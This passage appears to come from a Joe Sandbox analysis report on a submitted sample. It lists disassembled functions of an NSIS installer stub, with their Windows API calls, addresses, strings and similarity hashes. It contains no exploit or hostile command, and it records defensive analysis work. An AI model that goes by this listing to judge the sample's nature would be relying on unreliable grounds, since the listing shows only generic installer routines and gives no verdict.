                                                      • GetSysColor.USER32(?), ref: 00404417
                                                      • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404425
                                                      • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 00404433
                                                      • lstrlenW.KERNEL32(?), ref: 00404438
                                                      • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404445
                                                      • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 0040445A
                                                      • GetDlgItem.USER32(?,0000040A), ref: 004044B3
                                                      • SendMessageW.USER32(00000000), ref: 004044BA
                                                      • GetDlgItem.USER32(?,000003E8), ref: 004044E5
                                                      • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404528
                                                      • LoadCursorW.USER32(00000000,00007F02), ref: 00404536
                                                      • SetCursor.USER32(00000000), ref: 00404539
                                                      • ShellExecuteW.SHELL32(0000070B,open,004271A0,00000000,00000000,00000001), ref: 0040454E
                                                      • LoadCursorW.USER32(00000000,00007F00), ref: 0040455A
                                                      • SetCursor.USER32(00000000), ref: 0040455D
                                                      • SendMessageW.USER32(00000111,00000001,00000000), ref: 0040458C
                                                      • SendMessageW.USER32(00000010,00000000,00000000), ref: 0040459E
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.2484087963.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000008.00000002.2484031765.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000008.00000002.2484393312.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000008.00000002.2484453178.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000008.00000002.2484558832.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_400000_fTSt7dc60O.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                      • String ID: N$open
                                                      • API String ID: 3615053054-904208323
                                                      • Opcode ID: 3a3e15a46bcef9b8006e363d6ddaa5c0bc478510f2ba28bfd0355cb20498c547
                                                      • Instruction ID: 8b9c65ccee0929ae2cd37a550bbe3266d1c56d3aba5277cbe5cc7d17fb3eae84
                                                      • Opcode Fuzzy Hash: 3a3e15a46bcef9b8006e363d6ddaa5c0bc478510f2ba28bfd0355cb20498c547
                                                      • Instruction Fuzzy Hash: 19718FB1A00209FFDB109F60DD85A6A7BA9FB94354F00853AFB01B62D1C778AD51CF99
                                                      APIs
                                                      • lstrcpyW.KERNEL32(00425D88,NUL,?,00000000,?,?,?,00405E0A,?,?,00000001,00405982,?,00000000,000000F1,?), ref: 00405C76
                                                      • CloseHandle.KERNEL32(00000000,00000000,00000000,00000001,?,?,?,00405E0A,?,?,00000001,00405982,?,00000000,000000F1,?), ref: 00405C9A
                                                      • GetShortPathNameW.KERNEL32(00000000,00425D88,00000400), ref: 00405CA3
                                                        • Part of subcall function 00405B19: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405D53,00000000,[Rename],00000000,00000000,00000000), ref: 00405B29
                                                        • Part of subcall function 00405B19: lstrlenA.KERNEL32(00405D53,?,00000000,00405D53,00000000,[Rename],00000000,00000000,00000000), ref: 00405B5B
                                                      • GetShortPathNameW.KERNEL32(?,00426588,00000400), ref: 00405CC0
                                                      • wsprintfA.USER32 ref: 00405CDE
                                                      • GetFileSize.KERNEL32(00000000,00000000,00426588,C0000000,00000004,00426588,?,?,?,?,?), ref: 00405D19
                                                      • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00405D28
                                                      • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000), ref: 00405D60
                                                      • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,00000000,00425988,00000000,-0000000A,00409560,00000000,[Rename],00000000,00000000,00000000), ref: 00405DB6
                                                      • WriteFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00405DC8
                                                      • GlobalFree.KERNEL32(00000000), ref: 00405DCF
                                                      • CloseHandle.KERNEL32(00000000), ref: 00405DD6
                                                        • Part of subcall function 00405BB4: GetFileAttributesW.KERNEL32(00000003,00402DFF,00437800,80000000,00000003), ref: 00405BB8
                                                        • Part of subcall function 00405BB4: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 00405BDA
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.2484087963.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000008.00000002.2484031765.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000008.00000002.2484393312.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000008.00000002.2484453178.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000008.00000002.2484558832.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_400000_fTSt7dc60O.jbxd
                                                      Similarity
                                                      • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizeWritewsprintf
                                                      • String ID: %ls=%ls$NUL$[Rename]
                                                      • API String ID: 1265525490-899692902
                                                      • Opcode ID: 7d53d5cdfc02749ad00d931577bac562460a5dc9187a855172881db6ba44cc92
                                                      • Instruction ID: 10a6a65bcc8db41326b0965a868e5b78be2cc6b43571d182478210b5aa6aebd6
                                                      • Opcode Fuzzy Hash: 7d53d5cdfc02749ad00d931577bac562460a5dc9187a855172881db6ba44cc92
                                                      • Instruction Fuzzy Hash: E941FE71604A18BFD2206B61AC4CF6B3A6CEF45714F24443BB901B62D2EA78AD018A7D
                                                      APIs
                                                      • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                      • BeginPaint.USER32(?,?), ref: 00401047
                                                      • GetClientRect.USER32(?,?), ref: 0040105B
                                                      • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                      • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                      • DeleteObject.GDI32(?), ref: 004010ED
                                                      • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                      • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                      • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                      • SelectObject.GDI32(00000000,?), ref: 00401140
                                                      • DrawTextW.USER32(00000000,00428200,000000FF,00000010,00000820), ref: 00401156
                                                      • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                      • DeleteObject.GDI32(?), ref: 00401165
                                                      • EndPaint.USER32(?,?), ref: 0040116E
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.2484087963.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000008.00000002.2484031765.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000008.00000002.2484393312.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000008.00000002.2484453178.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000008.00000002.2484558832.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_400000_fTSt7dc60O.jbxd
                                                      Similarity
                                                      • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                      • String ID: F
                                                      • API String ID: 941294808-1304234792
                                                      • Opcode ID: c8f07ac8fddda19ee2bf7cb4f90658f54556206f608d49a47768e3a2d0e378b6
                                                      • Instruction ID: fcf32cd20748a1213536d9d4e972d5f65e682a1af5e7fde79162f5b09e182029
                                                      • Opcode Fuzzy Hash: c8f07ac8fddda19ee2bf7cb4f90658f54556206f608d49a47768e3a2d0e378b6
                                                      • Instruction Fuzzy Hash: D2418B71804249AFCB058FA5DD459BFBBB9FF44310F00852AF561AA1A0C738EA51DFA5
                                                      APIs
                                                      • GetDlgItem.USER32(?,000003FB), ref: 00404684
                                                      • SetWindowTextW.USER32(00000000,?), ref: 004046AE
                                                      • SHBrowseForFolderW.SHELL32(?), ref: 0040475F
                                                      • CoTaskMemFree.OLE32(00000000), ref: 0040476A
                                                      • lstrcmpiW.KERNEL32(004271A0,004226E8,00000000,?,?), ref: 0040479C
                                                      • lstrcatW.KERNEL32(?,004271A0), ref: 004047A8
                                                      • SetDlgItemTextW.USER32(?,000003FB,?), ref: 004047BA
                                                        • Part of subcall function 00405708: GetDlgItemTextW.USER32(?,?,00000400,004047F1), ref: 0040571B
                                                        • Part of subcall function 004061DC: CharNextW.USER32(?,*?|<>/":,00000000,00434000,00436800,00436800,00000000,00403332,00436800,771B3420,00403542), ref: 0040623F
                                                        • Part of subcall function 004061DC: CharNextW.USER32(?,?,?,00000000), ref: 0040624E
                                                        • Part of subcall function 004061DC: CharNextW.USER32(?,00434000,00436800,00436800,00000000,00403332,00436800,771B3420,00403542), ref: 00406253
                                                        • Part of subcall function 004061DC: CharPrevW.USER32(?,?,00436800,00436800,00000000,00403332,00436800,771B3420,00403542), ref: 00406266
                                                      • GetDiskFreeSpaceW.KERNEL32(004206B8,?,?,0000040F,?,004206B8,004206B8,?,00000000,004206B8,?,?,000003FB,?), ref: 0040487B
                                                      • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404896
                                                      • SetDlgItemTextW.USER32(00000000,00000400,004206A8), ref: 0040490F
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.2484087963.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000008.00000002.2484031765.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000008.00000002.2484393312.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000008.00000002.2484453178.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000008.00000002.2484558832.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_400000_fTSt7dc60O.jbxd
                                                      Similarity
                                                      • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpi
                                                      • String ID: A$&B
                                                      • API String ID: 2246997448-2586977930
                                                      • Opcode ID: 721fa909628c388d9eed4d059dc136074f5db6b4ff511665bfd1b1201094e888
                                                      • Instruction ID: 6e37369fe6ef7f71d764005b1086c215e28ed7130f32df1ae996be3c53d44702
                                                      • Opcode Fuzzy Hash: 721fa909628c388d9eed4d059dc136074f5db6b4ff511665bfd1b1201094e888
                                                      • Instruction Fuzzy Hash: A79170F1900219EBDB10AFA1DC85AAF77B8EF85714F10443BF601B62D1D77C9A418B69
                                                      APIs
                                                      • GetTickCount.KERNEL32 ref: 00402DD0
                                                      • GetModuleFileNameW.KERNEL32(00000000,00437800,00000400), ref: 00402DEC
                                                        • Part of subcall function 00405BB4: GetFileAttributesW.KERNEL32(00000003,00402DFF,00437800,80000000,00000003), ref: 00405BB8
                                                        • Part of subcall function 00405BB4: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 00405BDA
                                                      • GetFileSize.KERNEL32(00000000,00000000,00438000,00000000,00435800,00435800,00437800,00437800,80000000,00000003), ref: 00402E35
                                                      • GlobalAlloc.KERNEL32(00000040,00409230), ref: 00402F7C
                                                      Strings
                                                      • soft, xrefs: 00402EAC
                                                      • Null, xrefs: 00402EB5
                                                      • Error launching installer, xrefs: 00402E0C
                                                      • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00402FC5
                                                      • Inst, xrefs: 00402EA3
                                                      • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403013
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.2484087963.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000008.00000002.2484031765.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000008.00000002.2484393312.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000008.00000002.2484453178.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000008.00000002.2484558832.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_400000_fTSt7dc60O.jbxd
                                                      Similarity
                                                      • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                      • String ID: Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                      • API String ID: 2803837635-787788815
                                                      • Opcode ID: dbc4309bf9e12582ea8865ce62b28691ef8d5c521c6be9f7d6ce07414c4970ed
                                                      • Instruction ID: b2cc58b1aa553f56ba66d3b0850f03698e33e3340d89f7fe3e9d1fe3a0eb5287
                                                      • Opcode Fuzzy Hash: dbc4309bf9e12582ea8865ce62b28691ef8d5c521c6be9f7d6ce07414c4970ed
                                                      • Instruction Fuzzy Hash: 43610371941205ABDB209FA4DD85B9E3BB8EB04354F20447BF605B72D2C7BC9E418BAD
                                                      APIs
                                                      • GetVersion.KERNEL32(00000000,004216C8,?,00405229,004216C8,00000000,00000000,00000000), ref: 0040602D
                                                      • GetSystemDirectoryW.KERNEL32(004271A0,00000400), ref: 004060AB
                                                      • GetWindowsDirectoryW.KERNEL32(004271A0,00000400), ref: 004060BE
                                                      • SHGetSpecialFolderLocation.SHELL32(?,?), ref: 004060FA
                                                      • SHGetPathFromIDListW.SHELL32(?,004271A0), ref: 00406108
                                                      • CoTaskMemFree.OLE32(?), ref: 00406113
                                                      • lstrcatW.KERNEL32(004271A0,\Microsoft\Internet Explorer\Quick Launch), ref: 00406137
                                                      • lstrlenW.KERNEL32(004271A0,00000000,004216C8,?,00405229,004216C8,00000000,00000000,00000000), ref: 00406191
                                                      Strings
                                                      • \Microsoft\Internet Explorer\Quick Launch, xrefs: 00406131
                                                      • Software\Microsoft\Windows\CurrentVersion, xrefs: 00406079
                                                      Similarity
                                                      • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                      • String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                      • API String ID: 900638850-730719616
                                                      • Opcode ID: e03ee4e1462f3c7bda9b94e6fe8d7db5edd62b66dd87b3b0d45524ad71c1dce3
                                                      • Instruction ID: 5a47950f0b5222037037379568de6f858daa6aaa62ae53bcd4b1bc7075dc7fd7
                                                      • Opcode Fuzzy Hash: e03ee4e1462f3c7bda9b94e6fe8d7db5edd62b66dd87b3b0d45524ad71c1dce3
                                                      • Instruction Fuzzy Hash: DE611571A00105ABDF209F24CC40AAF37A5EF55314F52C13BE956BA2E1D73D4AA2CB5E
                                                      APIs
                                                      • GetWindowLongW.USER32(?,000000EB), ref: 0040421E
                                                      • GetSysColor.USER32(00000000), ref: 0040423A
                                                      • SetTextColor.GDI32(?,00000000), ref: 00404246
                                                      • SetBkMode.GDI32(?,?), ref: 00404252
                                                      • GetSysColor.USER32(?), ref: 00404265
                                                      • SetBkColor.GDI32(?,?), ref: 00404275
                                                      • DeleteObject.GDI32(?), ref: 0040428F
                                                      • CreateBrushIndirect.GDI32(?), ref: 00404299
                                                      Similarity
                                                      • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                      • String ID:
                                                      • API String ID: 2320649405-0
                                                      • Opcode ID: b90be86f4b41523f1c687d93ae3cdfe665fb5c0f546787b0b5a2f8f889851cd4
                                                      • Instruction ID: b52404dbcc62fb778985b33cde271554a932a1fc376a4a1675ca0a40f23ca1f0
                                                      • Opcode Fuzzy Hash: b90be86f4b41523f1c687d93ae3cdfe665fb5c0f546787b0b5a2f8f889851cd4
                                                      • Instruction Fuzzy Hash: B821A4B1A04704ABCB219F68DD08B4B7BF8AF80700F04896DFD91E22E1C338E804CB65
                                                      APIs
                                                      • ReadFile.KERNEL32(?,?,?,?), ref: 004025DB
                                                      • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402616
                                                      • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 00402639
                                                      • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 0040264F
                                                        • Part of subcall function 00405C37: ReadFile.KERNEL32(00409230,00000000,00000000,00000000,00000000,00413E90,0040BE90,0040330C,00409230,00409230,004031FE,00413E90,00004000,?,00000000,?), ref: 00405C4B
                                                        • Part of subcall function 00405E8F: wsprintfW.USER32 ref: 00405E9C
                                                      Similarity
                                                      • API ID: File$ByteCharMultiReadWide$Pointerwsprintf
                                                      • String ID: 9
                                                      • API String ID: 1149667376-2366072709
                                                      • Opcode ID: 13182ff9c3515e99dde9a7f361e17df10afd981257497e4f41ca39f28698b78d
                                                      • Instruction ID: 34008a6f5bb5370994306dbe4266d00811a1d2e87b5126a94146f67fdcf6739f
                                                      • Opcode Fuzzy Hash: 13182ff9c3515e99dde9a7f361e17df10afd981257497e4f41ca39f28698b78d
                                                      • Instruction Fuzzy Hash: 0E51E771E04209ABDF24DF94DE88AAEB779FF04304F50443BE511B62D0D7B99A42CB69
                                                      APIs
                                                      • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,?,000000F0), ref: 00402809
                                                      • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,?,000000F0), ref: 00402825
                                                      • GlobalFree.KERNEL32(FFFFFD66), ref: 0040285E
                                                      • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,000000F0), ref: 00402870
                                                      • GlobalFree.KERNEL32(00000000), ref: 00402877
                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,000000F0), ref: 0040288F
                                                      • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,?,000000F0), ref: 004028A3
                                                      Similarity
                                                      • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                      • String ID:
                                                      • API String ID: 3294113728-0
                                                      • Opcode ID: 175540e7daea46f04fdcb39c2d6b9fb6ccbbe72b81495e9a418fab8b18cc96be
                                                      • Instruction ID: c76d0c3f0677147b44531d70e17f5e21854c5a6159b3e076b4812541e28699f2
                                                      • Opcode Fuzzy Hash: 175540e7daea46f04fdcb39c2d6b9fb6ccbbe72b81495e9a418fab8b18cc96be
                                                      • Instruction Fuzzy Hash: C931BF72C00118BBDF11AFA5CE49DAF7E79EF04324F20423AF510762E1C6796E418BA9
                                                      APIs
                                                      • lstrlenW.KERNEL32(004216C8,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 0040522A
                                                      • lstrlenW.KERNEL32(00402D94,004216C8,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 0040523A
                                                      • lstrcatW.KERNEL32(004216C8,00402D94,00402D94,004216C8,00000000,00000000,00000000), ref: 0040524D
                                                      • SetWindowTextW.USER32(004216C8,004216C8), ref: 0040525F
                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405285
                                                      • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040529F
                                                      • SendMessageW.USER32(?,00001013,?,00000000), ref: 004052AD
                                                      Similarity
                                                      • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                      • String ID:
                                                      • API String ID: 2531174081-0
                                                      • Opcode ID: 3b277214ccb200348dce810b6065f154b0d7733336d6f52acf236ebd4cfd95e9
                                                      • Instruction ID: 09d17c59ce7287a2cbf3dc662f19c44123261f726eb293d34c68041fb2ac0666
                                                      • Opcode Fuzzy Hash: 3b277214ccb200348dce810b6065f154b0d7733336d6f52acf236ebd4cfd95e9
                                                      • Instruction Fuzzy Hash: CA21A131900558BBCB219FA5DD849DFBFB8EF54310F14807AF904B62A0C3798A81CFA8
                                                      APIs
                                                      • DestroyWindow.USER32(?,00000000), ref: 00402D35
                                                      • GetTickCount.KERNEL32 ref: 00402D53
                                                      • wsprintfW.USER32 ref: 00402D81
                                                        • Part of subcall function 004051F2: lstrlenW.KERNEL32(004216C8,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 0040522A
                                                        • Part of subcall function 004051F2: lstrlenW.KERNEL32(00402D94,004216C8,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 0040523A
                                                        • Part of subcall function 004051F2: lstrcatW.KERNEL32(004216C8,00402D94,00402D94,004216C8,00000000,00000000,00000000), ref: 0040524D
                                                        • Part of subcall function 004051F2: SetWindowTextW.USER32(004216C8,004216C8), ref: 0040525F
                                                        • Part of subcall function 004051F2: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405285
                                                        • Part of subcall function 004051F2: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040529F
                                                        • Part of subcall function 004051F2: SendMessageW.USER32(?,00001013,?,00000000), ref: 004052AD
                                                      • CreateDialogParamW.USER32(0000006F,00000000,00402C7F,00000000), ref: 00402DA5
                                                      • ShowWindow.USER32(00000000,00000005), ref: 00402DB3
                                                        • Part of subcall function 00402CFE: MulDiv.KERNEL32(?,00000064,?), ref: 00402D13
                                                      Similarity
                                                      • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                      • String ID: ... %d%%
                                                      • API String ID: 722711167-2449383134
                                                      • Opcode ID: ecca89fa2e5f998eed3815419d4b4a2aa167a0d5ca2c6de3075ca18f1a733700
                                                      • Instruction ID: 6ab1becf65089363c82906b09123353a2bcc309babf83807567d4fce196db36a
                                                      • Opcode Fuzzy Hash: ecca89fa2e5f998eed3815419d4b4a2aa167a0d5ca2c6de3075ca18f1a733700
                                                      • Instruction Fuzzy Hash: CD015E31909220EBC7616B64EE5DBDB3A68AB00704B14457BF905B11F1C6B85C45CFAE
                                                      APIs
                                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404AD7
                                                      • GetMessagePos.USER32 ref: 00404ADF
                                                      • ScreenToClient.USER32(?,?), ref: 00404AF9
                                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404B0B
                                                      • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404B31
                                                      Similarity
                                                      • API ID: Message$Send$ClientScreen
                                                      • String ID: f
                                                      • API String ID: 41195575-1993550816
                                                      • Opcode ID: 06f6ebea5bc1d9fbd35e9f77c39338462eb0780e6261c6c1cca29060ed6e4b7a
                                                      • Instruction ID: 0eecd9b69481b59551465bcf9db52b38cf56a1a0cd5b93a9aa54e622b558eefa
                                                      • Opcode Fuzzy Hash: 06f6ebea5bc1d9fbd35e9f77c39338462eb0780e6261c6c1cca29060ed6e4b7a
                                                      • Instruction Fuzzy Hash: 4B015E71E00219BADB10DBA4DD85FFEBBBCAB94711F10012BBB10B61D0D7B4A9018BA5
                                                      APIs
                                                      • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402C9D
                                                      • wsprintfW.USER32 ref: 00402CD1
                                                      • SetWindowTextW.USER32(?,?), ref: 00402CE1
                                                      • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402CF3
                                                      Similarity
                                                      • API ID: Text$ItemTimerWindowwsprintf
                                                      • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                      • API String ID: 1451636040-1158693248
                                                      • Opcode ID: fb2a05d00326c25166bc5f9aaa13d1f718a743be953a9e67bdfa073c3cfab417
                                                      • Instruction ID: 6313022a6a14420ec29aadc91542e870ad3eb66361cb8d6516b6428425dce57e
                                                      • Opcode Fuzzy Hash: fb2a05d00326c25166bc5f9aaa13d1f718a743be953a9e67bdfa073c3cfab417
                                                      • Instruction Fuzzy Hash: 36F01270504108ABEF205F50DD4ABAE3768BB00309F00843AFA16B51D1DBB95959DB59
                                                      APIs
                                                      • lstrlenW.KERNEL32(004226E8,004226E8,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,0000040F,00000400,00000000), ref: 00404A67
                                                      • wsprintfW.USER32 ref: 00404A70
                                                      • SetDlgItemTextW.USER32(?,004226E8), ref: 00404A83
                                                      Similarity
                                                      • API ID: ItemTextlstrlenwsprintf
                                                      • String ID: %u.%u%s%s$&B
                                                      • API String ID: 3540041739-2907463167
                                                      • Opcode ID: 8753f46c6ec8b6f380e8412305eac44d84582c9e4d7b05b47d8315f57e295f46
                                                      • Instruction ID: b2bc00afb158c588b9a06456614f3f49c694bd1d1c2ad39e9d347cd1a0135542
                                                      • Opcode Fuzzy Hash: 8753f46c6ec8b6f380e8412305eac44d84582c9e4d7b05b47d8315f57e295f46
                                                      • Instruction Fuzzy Hash: 131126737001247BCB10A66D9C45EDF324DDBC5334F144237FA65F60D1D938882186E8
                                                      APIs
                                                      • CharNextW.USER32(?,*?|<>/":,00000000,00434000,00436800,00436800,00000000,00403332,00436800,771B3420,00403542), ref: 0040623F
                                                      • CharNextW.USER32(?,?,?,00000000), ref: 0040624E
                                                      • CharNextW.USER32(?,00434000,00436800,00436800,00000000,00403332,00436800,771B3420,00403542), ref: 00406253
                                                      • CharPrevW.USER32(?,?,00436800,00436800,00000000,00403332,00436800,771B3420,00403542), ref: 00406266
                                                      Similarity
                                                      • API ID: Char$Next$Prev
                                                      • String ID: *?|<>/":
                                                      • API String ID: 589700163-165019052
                                                      • Opcode ID: 1606a10478bcb54d9e464e7e1942e813b7f97a0a03c371f366e1e5ab139a473f
                                                      • Instruction ID: 5b12d47152ff200ae170f947aa1a5954375b24b0904b9d00ef93706c4e891e75
                                                      • Opcode Fuzzy Hash: 1606a10478bcb54d9e464e7e1942e813b7f97a0a03c371f366e1e5ab139a473f
                                                      • Instruction Fuzzy Hash: 1311E61580020295DB303B548C44AB772F8EF95750F42807FED9A732C1E77C5CA286BD
                                                      APIs
                                                      • WideCharToMultiByte.KERNEL32(?,?,0040A598,000000FF,00409D98,00000400,?,?,00000021), ref: 0040252F
                                                      • lstrlenA.KERNEL32(00409D98,?,?,0040A598,000000FF,00409D98,00000400,?,?,00000021), ref: 00402536
                                                      • WriteFile.KERNEL32(00000000,?,00409D98,00000000,?,?,00000000,00000011), ref: 00402568
                                                      Similarity
                                                      • API ID: ByteCharFileMultiWideWritelstrlen
                                                      • String ID: 8
                                                      • API String ID: 1453599865-4194326291
                                                      APIs
                                                      • lstrcatW.KERNEL32(00000000,00000000,00409598,00435000,?,?,00000031), ref: 00401793
                                                      • CompareFileTime.KERNEL32(-00000014,?,00409598,00409598,00000000,00000000,00409598,00435000,?,?,00000031), ref: 004017B8
                                                        • Part of subcall function 00405F48: lstrcpynW.KERNEL32(?,?,00000400,004033C8,00428200,NSIS Error), ref: 00405F55
                                                        • Part of subcall function 004051F2: lstrlenW.KERNEL32(004216C8,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 0040522A
                                                        • Part of subcall function 004051F2: lstrlenW.KERNEL32(00402D94,004216C8,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 0040523A
                                                        • Part of subcall function 004051F2: lstrcatW.KERNEL32(004216C8,00402D94,00402D94,004216C8,00000000,00000000,00000000), ref: 0040524D
                                                        • Part of subcall function 004051F2: SetWindowTextW.USER32(004216C8,004216C8), ref: 0040525F
                                                        • Part of subcall function 004051F2: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405285
                                                        • Part of subcall function 004051F2: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040529F
                                                        • Part of subcall function 004051F2: SendMessageW.USER32(?,00001013,?,00000000), ref: 004052AD
                                                      Similarity
                                                      • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                      • String ID:
                                                      • API String ID: 1941528284-0
                                                      APIs
                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00402B9B
                                                      • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402BD7
                                                      • RegCloseKey.ADVAPI32(?), ref: 00402BE0
                                                      • RegCloseKey.ADVAPI32(?), ref: 00402C05
                                                      • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402C23
                                                      Similarity
                                                      • API ID: Close$DeleteEnumOpen
                                                      • String ID:
                                                      • API String ID: 1912718029-0
                                                      APIs
                                                      • GetDlgItem.USER32(?,?), ref: 00401CEB
                                                      • GetClientRect.USER32(00000000,?), ref: 00401CF8
                                                      • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D19
                                                      • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D27
                                                      • DeleteObject.GDI32(00000000), ref: 00401D36
                                                      Similarity
                                                      • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                      • String ID:
                                                      • API String ID: 1849352358-0
                                                      APIs
                                                      • GetDC.USER32(?), ref: 00401D44
                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D51
                                                      • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D60
                                                      • ReleaseDC.USER32(?,00000000), ref: 00401D71
                                                      • CreateFontIndirectW.GDI32(0040BDA0), ref: 00401DBC
                                                      Similarity
                                                      • API ID: CapsCreateDeviceFontIndirectRelease
                                                      • String ID:
                                                      • API String ID: 3808545654-0
                                                      APIs
